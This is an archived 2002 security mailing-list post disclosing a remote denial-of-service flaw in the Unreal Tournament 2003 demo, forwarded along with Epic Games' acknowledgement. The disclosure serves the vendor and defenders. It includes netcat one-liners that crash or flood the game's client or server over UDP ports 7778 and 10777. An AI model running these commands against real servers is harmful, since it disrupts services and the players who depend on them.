|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Arne Schwerdtfegger (knud_at_skodliv.dk)
Date: Tue Sep 17 2002 - 10:23:13 CDT
This might be of interest since the isse at hand is fixed now.
----- Original Message -----
From: "Daniel Vogel" <vogel
epicgames.com>
To: "Arne Schwerdtfegger" <knudskodliv.dk>; <ut2003bugsepicgames.com>
Sent: Saturday, September 14, 2002 11:11 PM
Subject: RE: [ut2003bugs] remote denial of service in ut2003 demo
> We will address this denial of service attack shortly.
>
> Thanks!
>
> -- Daniel, Epic Games Inc.
>
> > -----Original Message-----
> > From: owner-ut2003bugslists.epicgames.com
> > [mailto:owner-ut2003bugslists.epicgames.com]On Behalf Of Arne
> > Schwerdtfegger
> > Sent: Saturday, September 14, 2002 5:03 PM
> > To: ut2003bugsepicgames.com
> > Subject: [ut2003bugs] remote denial of service in ut2003 demo
> >
> >
> > Dear sirs,
> >
> > It's possible to crash the client/the dedicated server by sending 1-3
> > character to udp ports 7778 or 10777. 4 characters will produce the
> > following in the console: "Log: Unkown ping request command: 65".
> > This can be reproduced with netcat[1] as follows:
> > echo "a" | nc -u target 10777
> >
> > Doing something like `cat /dev/urandom | nc -u target 7778`
> > will flood the console with "Log: RecvFrom returned SOCKET_ERROR 10040"
> >
> > The tested platform was windows 2000 with servicepack 3, not that I
think
> > it matters.
> >
> > [1] http://www.atstake.com/research/tools/
> > --
> > Knud Erik Højgaard
> > knudINVALIDskodliv.dk
> >
>
>
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]